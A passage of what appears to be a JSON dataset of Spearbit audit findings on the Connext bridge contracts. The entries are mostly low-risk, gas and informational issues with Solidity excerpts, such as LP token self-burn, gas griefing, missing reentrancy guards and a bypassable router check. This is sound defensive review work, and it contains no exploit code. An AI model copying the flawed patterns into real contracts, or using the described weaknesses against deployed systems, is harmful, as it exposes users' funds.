... } else { ... _t.burn(msg.sender, _amount); ... } ... // doesn't use up the allowance } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function burn(address _from, uint256 _amnt) external override onlyOwner { _burn(_from, _amnt); } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Two step ownership transfer", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function setAdmin() transfer ownership to a new address. In case a wrong address is supplied ownership is inaccessible. The same issue occurs with transferOwnership of OwnableUpgradeable in several Nomad contracts. Additionally the Nomad contract try to prevent renounceOwnership, however, this can also be accomplished with transferOwnership to a non existing address. Relevant Nomad contracts: TokenRegistry.sol NomadBase.sol UpdaterManager.sol XAppConnectionManager.sol 29 contract ConnextPriceOracle is PriceOracle { ... function setAdmin(address newAdmin) external onlyAdmin { address oldAdmin = admin; admin = newAdmin; emit NewAdmin(oldAdmin, newAdmin); } } contract BridgeRouter is Version0, Router { ... /** * @dev should be impossible to renounce ownership; * * */ we override OpenZeppelin OwnableUpgradeable's implementation of renounceOwnership to make it a no-op function renounceOwnership() public override onlyOwner { // do nothing } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Function removeRouter does not clear approvedForPortalRouters", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function removeRouter() clears most of the fields of the struct RouterPermissionsManagerInfo except for approvedForPortalRouters. However, it is still good to also remove approvedForPortalRouters in removeRouter() because if the router were to be added again later (via setupRouter() ) or _isRouterOwnershipRenounced is set in the future, the router would still have the old approvedForPortalRouters. 30 struct RouterPermissionsManagerInfo { mapping(address => bool) approvedRouters; // deleted mapping(address => bool) approvedForPortalRouters; // not deleted mapping(address => address) routerRecipients; // deleted mapping(address => address) routerOwners; // deleted mapping(address => address) proposedRouterOwners; // deleted mapping(address => uint256) proposedRouterTimestamp; // deleted } contract RoutersFacet is BaseConnextFacet { function removeRouter(address router) external onlyOwner { ... s.routerPermissionInfo.approvedRouters[router] = false; ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... delete s.routerPermissionInfo.proposedRouterOwners[router]; delete s.routerPermissionInfo.proposedRouterTimestamp[router]; } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Anyone can self burn lp token of the AMM", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When providing liquidity into the AMM pool, users get LP tokens. Users can redeem their shares of the liquidity by redeeming LP to the AMM pool. The current LPToken contract inherits Openzepplins ERC20BurnableUpgradeable. Users can burn their tokens by calling burn without notifying the AMM pools. ERC20BurnableUpgradeable.sol#L26-L28. Although users do not profit from this action, it brings up concerns such as: An exploiter has an easy way to pump the LP price. Burning LP is similar to donating value to the pool. While its good for the pool, this gives the exploiter another tool to break other protocols. After the cream finance attack many protocols started to take extra caution and made this a restricted function (absorbing donation) github.com/yearn/yearn-security/blob/master/disclosures/2021-10-27.md. Against the best practice. Every state of an AMM is related to price. Allowing external actors to change the AMM states without notifying the main contract is dangerous. Its also harder for a developer to build other novel AMM based on the same architecture. Note: the burn function is also not protected by nonReentrant or whenNotPaused.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Skip timeout in diamondCut() (edge case)", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Edge case: If someone manages to get an update through which deletes all facets then the next update skips the delay (because ds.facetAddresses.length will be 0). library LibDiamond { function diamondCut(...) ... { ... if (ds.facetAddresses.length != 0) { uint256 time = ds.acceptanceTimes[keccak256(abi.encode(_diamondCut, _init, _calldata))]; require(time != 0 && time < block.timestamp, \"LibDiamond: delay not elapsed\"); } // Otherwise, this is the first instance of deployment and it can be set automatically ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Limit gas for s.executor.execute()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The call to s.executor.execute() in BridgeFacet might use up all available gas. In that case, the call to callback to report to the originator might not be called because the execution stops due an out of gas error. Note: the execute() function might be retried by the relayer so perhaps this will fix itself eventually. Note: excessivelySafeCall in Executor does limit the amount of gas. contract BridgeFacet is BaseConnextFacet { function _handleExecuteTransaction(...) ... { ... (bool success, bytes memory returnData) = s.executor.execute(...); // might use all available ,! gas ... // If callback address is not zero, send on the PromiseRouter if (_args.params.callback != address(0)) { s.promiseRouter.send(...); // might not have enough gas } ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Several external functions missing whenNotPaused mofifier", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The following functions dont have a whenNotPaused modifier while most other external functions do. bumpTransfer of BridgeFacet. forceReceiveLocal of BridgeFacet. repayAavePortal of PortalFacet. repayAavePortalFor of PortalFacet. Without whenNotPaused these functions can still be executed when the protocol is paused.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Gas griefing attack on callback execution", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When the callback is executed on the source chain the following line can revert or consume all forwarded gas. In this case, the relayer wastes gas and doesnt get the callback fee. ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData());", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Callback fails when returnData is empty", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "If a transfer involves a callback, PromiseRouter reverts if returnData is empty. if (_returnData.length == 0) revert PromiseRouter__send_returndataEmpty(); However, the callback should be allowed in case the user wants to report the calldata execution success on the destination chain (_returnSuccess).", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Redundant fee on transfer logic", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function repayAavePortalFor() has logic for fee on transfer tokens. However, handleIncomin- gAsset() doesnt allow fee on transfer tokens. So this extra code shouldnt be necessary in repayAavePortal- For(). function repayAavePortalFor(...) ... { ... (, uint256 amount) = AssetLogic.handleIncomingAsset(_adopted, total, 0); ... // If this was a fee on transfer token, reduce the total if (amount < total) { uint256 missing; unchecked { missing = total - amount; } if (missing < _feeAmount) { // Debit fee amount unchecked { _feeAmount -= missing; } } else { // Debit backing amount unchecked { missing -= _feeAmount; } _feeAmount = 0; _backingAmount -= missing; } } ... } library AssetLogic { function handleIncomingAsset(...) ... { ... // Transfer asset to contract trueAmount = transferAssetToContract(_assetId, _assetAmount); .... } function transferAssetToContract(address _assetId, uint256 _amount) internal returns (uint256) { ... // Validate correct amounts are transferred uint256 starting = IERC20(_assetId).balanceOf(address(this)); SafeERC20.safeTransferFrom(IERC20(_assetId), msg.sender, address(this), _amount); // Ensure this was not a fee-on-transfer token if (IERC20(_assetId).balanceOf(address(this)) - starting != _amount) { revert AssetLogic__transferAssetToContract_feeOnTransferNotSupported(); } ... } } 34", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" + ] + }, + { + "title": "Some gas can be saved in reimburseLiquidityFees", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Some gas can be saved by assigning tokenExchange before the if statement. This also improves readability. function reimburseLiquidityFees(...) ... { ... if (address(tokenExchanges[_token]) != address(0)) { // could use `tokenExchange` ITokenExchange tokenExchange = tokenExchanges[_token]; // do before the if }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" + ] + }, + { + "title": "LIQUIDITY_FEE_DENOMINATOR could be a constant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The value of LIQUIDITY_FEE_DENOMINATOR seems to be constant. However, it is currently stored in s and requires an SLOAD operation to retrieve it, increasing gas costs. upgrade-initializers/DiamondInit.sol: BridgeFacet.sol: BridgeFacet.sol: PortalFacet.sol: AssetLogic.sol: s.LIQUIDITY_FEE_DENOMINATOR = 10000; toSwap = _getFastTransferAmount(..., s.LIQUIDITY_FEE_DENOMINATOR); s.portalFeeDebt[_transferId] = ... / s.LIQUIDITY_FEE_DENOMINATOR; if (_aavePortalFeeNumerator > s.LIQUIDITY_FEE_DENOMINATOR) ... uint256 minReceived = (_amount * _slippageTol) / s.LIQUIDITY_FEE_DENOMINATOR;", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" + ] + }, + { + "title": "Access elements from storage array instead of loading them in memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "SwapUtils.removeLiquidityOneToken() function only needs the length and one element of the storage array self.pooledTokens. For this, the function reads the entire array in memory which costs extra gas. IERC20[] memory pooledTokens = self.pooledTokens; ... uint256 numTokens = pooledTokens.length; ... pooledTokens[tokenIndex].safeTransfer(msg.sender, dy); 35", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" + ] + }, + { + "title": "Send information through calldata instead of having callee query Executor", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Executor.originSender(), Executor.origin(), and Executor.amount() to permission crosschain calls. This costs extra gas because of staticcalls made to an external contract.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Gas Optimization" + ] + }, + { + "title": "AAVE portal debt might not be repaid in full if debt is converted to interest paying", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The Aave portal mechanism gives routers access to a limited amount of unbacked debt which is to be used when fronting liquidity for cross-chain transfers. The process for receiving unbacked debt is as follows: During message execution, the protocol checks if a single liquidity provider has bid on a liquidity auction which is handled by the relayer network. If the provider has insufficient liquidity, the protocol attempts to utilize AAVE unbacked debt by minting uncol- lateralised aTokens and withdrawing them from the pool. The withdrawn amount is immediately used to pay out the recipient of the bridge transfer. Currently the debt is fixed fee, see arc-whitelist-connext-for-v3-portals, however this might be changed in the future out of band. Incase this would be changed: upon repayment, AAVE will actually expect unbackedDebt + fee + aToken interest. The current implementation will only track unbackedDebt + fee, hence, the protocol will accrue bad debt in the form of interest. Eventually, the extent of this bad debt will reach a point where the unbacked- MintCap has been reached and noone is able to pay off this debt. I consider this to be a long-term issue that could be handled in a future upgrade, however, it is important to highlight and address these issues early.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Routers pay the slippage cost for users when using AAVE credit", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "When routers do the fast of adopted token and _fastTransferAmount = * _fastTransferAmount /s.LIQUIDITY_FEE_DENOMINATOR _args.amount * s.LIQUIDITY_FEE_NUMERATOR / s.LIQUIDITY_FEE_DENOMINATOR. The routers get reimbursed _args.amount of local tokens afterward. Thus, the routers lose money if the slippage of swapping between local tokens and adopted tokens are larger than the liquidityFee. function _executePortalTransfer( bytes32 _transferId, bytes32 _canonicalId, uint256 _fastTransferAmount, address _router ) internal returns (uint256, address) { // Calculate local to adopted swap output if needed address adopted = s.canonicalToAdopted[_canonicalId]; ,! ,! ,! IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); // Improvement: Instead of withdrawing to address(this), withdraw directly to the user or executor to save 1 transfer uint256 amountWithdrawn = IAavePool(s.aavePool).withdraw(adopted, _fastTransferAmount, address(this)); if (amountWithdrawn < _fastTransferAmount) revert BridgeFacet__executePortalTransfer_insufficientAmountWithdrawn(); // Store principle debt s.portalDebt[_transferId] = _fastTransferAmount; // Store fee debt s.portalFeeDebt[_transferId] = (s.aavePortalFeeNumerator * _fastTransferAmount) / s.LIQUIDITY_FEE_DENOMINATOR; ,! emit AavePortalMintUnbacked(_transferId, _router, adopted, _fastTransferAmount); return (_fastTransferAmount, adopted); }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Optimize max checks in initializeSwap()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function initializeSwap() reverts if a value is >= ...MAX.... Probably should revert when > ...MAX.... function initializeSwap(...) ... { ... // Check _a, _fee, _adminFee, _withdrawFee parameters if (_a >= AmplificationUtils.MAX_A) revert SwapAdminFacet__initializeSwap_aExceedMax(); if (_fee >= SwapUtils.MAX_SWAP_FEE) revert SwapAdminFacet__initializeSwap_feeExceedMax(); if (_adminFee >= SwapUtils.MAX_ADMIN_FEE) revert SwapAdminFacet__initializeSwap_adminFeeExceedMax(); ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "All routers share the same AAVE debt", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The mintUnbacked amount is allocated to the calling contract (eg the Connext Diamond that has the BRIDGE role permission). Thus it is not separated to different routers, if one router does not payback its debt (in time) and has the max debt then this facility cannot be used any more. function _executePortalTransfer( ... ) ... { ... IAavePool(s.aavePool).mintUnbacked(adopted, _fastTransferAmount, address(this), AAVE_REFERRAL_CODE); ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Careful with fee on transfer tokens on AAVE loans", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The Aave function backUnbacked() does not account for fee on transfer tokens. If these happen to be used then the accounting might not be right. function _backLoan(...) ... { ... // back loan IAavePool(s.aavePool).backUnbacked(_asset, _backing, _fee); ... } library BridgeLogic { function executeBackUnbacked(... ) ... { ... reserve.unbacked -= backingAmount.toUint128(); reserve.updateInterestRates(reserveCache, asset, added, 0); IERC20(asset).safeTransferFrom(msg.sender, reserveCache.aTokenAddress, added); ... } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Let getTokenPrice() also return the source of the price info", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function getTokenPrice() can get its prices information from multiple sources. For the caller it might be important to know which source was used. function getTokenPrice(address _tokenAddress) public view override returns (uint256) { }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Typos in the comments of _swapAsset() and _swapAssetOut()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "There are typos in the comments of _swapAsset() and _swapAssetOut(): * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAsset(... ) ... * @notice Swaps assetIn t assetOut using the stored stable swap or internal swap pool function _swapAssetOut(...) ...", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Consistently delete array entries in PromiseRouter", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "In function process() of PromiseRouter.sol two different ways are used to clear a value: one with delete and the other with = 0. Although technically the same it better to use the same method to maintain consistency. function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // remove message delete messageHashes[transferId]; // remove callback fees callbackFees[transferId] = 0; ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "getTokenPrice() will revert if setDirectPrice() is set in the future", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The setDirectPrice() function allows the protocol admin to update the price up to two seconds in the future. This impacts the getTokenPrice() function as the updated value may be slightly incorrect.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Low Risk" + ] + }, + { + "title": "Roundup in words not optimal", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function words, which is used in the Nomad code base, tries to do a round up. Currently it adds 1 to the len. /** * @notice * @param memView * @return */ The number of memory words this memory view occupies, rounded up. The view uint256 - The number of memory words function words(bytes29 memView) internal pure returns (uint256) { return uint256(len(memView)).add(32) / 32; }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "callback could have capped returnData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function execute() caps the result of the call to excessivelySafeCall to a maximum of MAX_- COPY bytes, making sure the result is small enough to fit in a message sent back to the originator. However, when the callback is done the originator needs to be aware that the data can be capped and this fact is not clearly documented. 41 function execute(...) ... { ... (success, returnData) = ExcessivelySafeCall.excessivelySafeCall( _args.to, gas, isNative ? _args.amount : 0, MAX_COPY, _args.callData ); } function process(bytes32 transferId, bytes calldata _message) public nonReentrant { ... // execute callback ICallback(callbackAddress).callback(transferId, _msg.returnSuccess(), _msg.returnData()); // returnData is capped ... ,! }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Several external functions are not nonReentrant", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The following functions dont have nonReentrant, while most other external functions do have such modifier. bumpTransfer of BridgeFacet. forceReceiveLocal of BridgeFacet. repayAavePortal of PortalFacet. repayAavePortalFor of PortalFacet. initiateClaim of RelayerFacet. There are many swaps in the protocol and some of them should be conducted in an aggregator (not yet imple- mented). A lot of the aggregators use the difference between pre-swap balance and post-swap balance. (e.g. uniswap v3 router , 1inch, etc.. ). While this isnt exploitable yet, there is a chance that future updates might open up an issue to exploit.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "NomadFacet.reconcile() has an unused argument canonicalDomain", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "NomadFacet.reconcile() has an unused argument canonicalDomain.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "SwapUtils._calculateSwap() returns two values with different precision", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "SwapUtils._calculateSwap() returns (uint256 dy, uint256 dyFee). dy is the amount of tokens a user will get from a swap and dyFee is the associated fee. To account for the different token decimal precision between the two tokens being swapped, a multipliers mapping is used to bring the precision to the same value. To return the final values, dy is changed back to the original token precision but dyFee is not. This is an internal function and the callers adjust the fee precision back to normal, therefore severity is informa- tional. But without documentation it is easy to miss.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Multicall.sol not compatible with Natspec", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Multicall.sol Natspec comment specifies: /// @title Multicall - Aggregate results from multiple read-only function calls However, to call those functions it uses a low level call() method which can call write functions as well. (bool success, bytes memory ret) = calls[i].target.call(calls[i].callData);", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "reimburseRelayerFees only what is necessary", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function reimburseRelayerFees() gives a maximum of relayerFeeCap to a receiver, unless it already has a balance of relayerFeeCap. This implicitly means that a balance relayerFeeCap is sufficient. So if a receiver already has a balance only relayerFeeCap - _to.balance is required. This way more recipients can be reimbursed with the same amount of funds in the SponsorVault. function reimburseRelayerFees(...) ... { ... if (_to.balance > relayerFeeCap || Address.isContract(_to)) { // Already has fees, and the address is a contract return; } ... sponsoredFee = sponsoredFee >= relayerFeeCap ? relayerFeeCap : sponsoredFee; ... }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "safeIncreaseAllowance and safeDecreaseAllowance can be replaced with safeApprove in _recon- cileProcessPortal", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The NomadFacet uses safeIncreaseAllowance after clearing the allowance. creaseAllowance to clear the allowance. Using safeApprove is potentially safer in this case. Some non-standard tokens only allow the allowance to change from zero, or change to zero. Using safeDecreaseAllowance would potentially break the contract in a future update. Note that SafeApprove has been deprecated for the concern of a front-running attack. It is only supported when setting an initial allowance or setting the allowance to zero SafeERC20.sol#L38", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Event not emitted when ERC20 and native asset is transferred together to SponsorVault", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Any ERC20 token or native asset can be transferred to SponsorVault contract by calling the de- posit() function. It emits a Deposit() event logging the transferred asset and the amount. However, if the native asset and an ERC20 token are transferred in the same call only a single event corresponding to the ERC20 transfer is emitted.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "payable keyword can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "If a function does not need to have the native asset sent to it it is recommended to not mark it as payable and avoid any funds getting. StableSwapFacet.sol has two payable functions: swapExact() and swapExactOut, which only swap ERC20 tokens and are not expected to receive the native asset.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Improve variable naming", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Two different variables/functions with an almost identical name are prone to error. Variable names like _routerOwnershipRenounced and _assetOwnershipRenounced do not correctly reflect their meaning as they actually refer to the ownership whitelist being renounced. 45 function _isRouterOwnershipRenounced() internal view returns (bool) { return LibDiamond.contractOwner() == address(0) || s._routerOwnershipRenounced; } /** * @notice Indicates if the ownership of the asset whitelist has * been renounced */ function _isAssetOwnershipRenounced() internal view returns (bool) { ... bool _routerOwnershipRenounced; ... // 27 bool _assetOwnershipRenounced; The constant EMPTY is defined twice with different values. This is confusing and could lead to errors. contract BaseConnextFacet { ... bytes32 internal constant EMPTY = hex\"c5d2460186f7233c927e7db2dcc703c0e500b653ca82273b7bfad8045d85a470\"; ... ,! } library LibCrossDomainProperty { ... bytes29 public constant EMPTY = hex\"ffffffffffffffffffffffffffffffffffffffffffffffffffffffffff\"; ... } The function xcall() uses both _args.transactingAssetId and transactingAssetId. two, but they each have a very specific meaning and missing it introduces problems. It is easy to mix these function xcall(...) ... { ... address transactingAssetId = _args.transactingAssetId == address(0) ? address(s.wrapper) : _args.transactingAssetId; ... (, uint256 amount) = AssetLogic.handleIncomingAsset( _args.transactingAssetId, ... ); ... (uint256 bridgedAmt, address bridged) = AssetLogic.swapToLocalAssetIfNeeded( ..., transactingAssetId, ... ); ... } In the _handleExecuteTransaction function of BridgeFacet, _args.amount and _amount are used. In this func- tion: _args.amount is equal to bridged_amount; 46 _amount is equal to bridged_amount - liquidityFee (and potentially swapped amount).", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "onlyRemoteRouter can be circumvented", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "BaseConnextFacet-fix. However, the change has not been applied to Router.sol#L56-L58 which is currently in use. The modifier onlyRemoteRouter() can be mislead if the sender parameter has the value 0. The modifier uses _m.sender() from the received message by Nomad. Assuming all checks of Nomad work as expected this value cannot be 0 as it originates from a msg.sender in Home.sol. contract Replica is Version0, NomadBase { function process(bytes memory _message) public returns (bool _success) { ... bytes29 _m = _message.ref(0); ... // ensure message has been proven bytes32 _messageHash = _m.keccak(); require(acceptableRoot(messages[_messageHash]), \"!proven\"); ... IMessageRecipient(_m.recipientAddress()).handle( _m.origin(), _m.nonce(), _m.sender(), _m.body().clone() ); ... } } contract BridgeRouter is Version0, Router { function handle(uint32 _origin,uint32 _nonce,bytes32 _sender,bytes memory _message) external override onlyReplica onlyRemoteRouter(_origin, _sender) { ... } } abstract contract Router is XAppConnectionClient, IMessageRecipient { ... modifier onlyRemoteRouter(uint32 _origin, bytes32 _router) { require(_isRemoteRouter(_origin, _router), \"!remote router\"); _; } function _isRemoteRouter(uint32 _domain, bytes32 _router) internal view returns (bool) { return remotes[_domain] == _router; // if _router == 0 then this is true for random _domains } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Some dust not accounted for in reconcile()", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The function _handleExecuteLiquidity() in BridgeFacet takes care of rounding issues in toSwap / pathLen. However, the inverse function reconcile() in NomadFacet() does not do that. So, tiny amounts of tokens (dust) are not accounted for in reconcile(). contract BridgeFacet is BaseConnextFacet { ... function _handleExecuteLiquidity(...) ... { ... // For each router, assert they are approved, and deduct liquidity. uint256 routerAmount = toSwap / pathLen; for (uint256 i; i < pathLen - 1; ) { s.routerBalances[_args.routers[i]][_args.local] -= routerAmount; unchecked { ++i; } } // The last router in the multipath will sweep the remaining balance to account for remainder ,! dust. uint256 toSweep = routerAmount + (toSwap % pathLen); s.routerBalances[_args.routers[pathLen - 1]][_args.local] -= toSweep; } } } contract NomadFacet is BaseConnextFacet { ... function reconcile(...) ... { ... uint256 routerAmt = toDistribute / pathLen; for (uint256 i; i < pathLen; ) { s.routerBalances[routers[i]][localToken] += routerAmt; unchecked { ++i; } } } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Careful with the decimals of BridgeTokens", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The BridgeRouter sends token details including the decimals() over the nomad bridge to configure a new deployed token. After setting the hash with setDetailsHash() anyone can call setDetails() on the token to set the details. The decimals() are mainly used for user interfaces so it might not be a large problem when the setDetails() is executed at later point in time. However initializeSwap() also uses decimals(), this is called via offchain code. In the example code of initializeSwap.ts it retrieves the decimals() from the deployed token on the destination chain. This introduces a race condition between setDetails() and initializeSwap.ts, depending on which is executed first, the swaps will have different results. Note: It could also break the ConnextPriceOracle contract BridgeRouter is Version0, Router { ... function _send( ... ) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... // query token contract for details and calculate detailsHash _detailsHash = BridgeMessage.getDetailsHash(_t.name(), _t.symbol(), _t.decimals()); } else { ... } } function _handleTransfer(...) ... { ... if (tokenRegistry.isLocalOrigin(_token)) { ... } else { ... IBridgeToken(_token).setDetailsHash(_action.detailsHash()); // so hash is set now } } } contract BridgeToken is Version0, IBridgeToken, OwnableUpgradeable, ERC20 { ... function setDetails(..., uint8 _newDecimals) ... { // can be called by anyone ... require( _isFirstDetails || BridgeMessage.getDetailsHash(..., _newDecimals) == detailsHash, \"!committed details\" ); ... token.decimals = _newDecimals; ... } } Example script: initializeSwap.ts 49 const decimals = await Promise.all([ (await ethers.getContractAt(\"TestERC20\", local)).decimals(), (await ethers.getContractAt(\"TestERC20\", adopted)).decimals(), // setDetails might not have ,! been done ]); const tx = await connext.initializeSwap(..., decimals, ... ); ); contract SwapAdminFacet is BaseConnextFacet { ... function initializeSwap(..., uint8[] memory decimals, ... ) ... { ... for (uint8 i; i < numPooledTokens; ) { ... precisionMultipliers[i] = 10**uint256(SwapUtils.POOL_PRECISION_DECIMALS - decimals[i]); ... } } }", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Incorrect comment about ERC20 approval to zero-address", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The linked code notes in a comment: // NOTE: if pool is not registered here, then the approval will fail // as it will approve to the zero-address SafeERC20.safeIncreaseAllowance(IERC20(_assetIn), address(pool), _amount); This is not always true. The ERC20 spec doesnt have this restriction and ERC20 tokens based on solmate also dont revert on approving to zero-address. There is no risk here as the following line of code for zero-address pools will revert. return (pool.swapExact(_amount, _assetIn, _assetOut, minReceived), _assetOut);", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Native asset is delivered even if the wrapped asset is transferred", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "Connext delivers the native asset on the destination chain even if the wrapped asset was transferred. This is because on the source chain the native asset is converted to the wrapped asset, and then the distinction is lost. On the destination chain it is not possible to know which of these two assets was transferred, and hence a choice is made to transfer the native asset. if (_assetId == address(0)) revert AssetLogic__transferAssetFromContract_notNative(); if (_assetId == address(s.wrapper)) { // If dealing with wrapped assets, make sure they are properly unwrapped // before sending from contract s.wrapper.withdraw(_amount); Address.sendValue(payable(_to), _amount); } else { ...", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Entire transfer amount is borrowed from AAVE Portal when a router has insufficient balance", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "If the router picked by the Sequencer doesnt have enough balance to transfer the required amount, it can borrow the entire amount from Aave Portal. For a huge amount, it will block borrowing for other routers since there is a limit on the total maximum amount that can be borrowed.", + "labels": [ + "Spearbit", + "Connext", + "Severity: Informational" + ] + }, + { + "title": "Unused variable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Connext-Spearbit-Security-Review.pdf", + "body": "The variable message is not used after declaration. bytes memory message;", 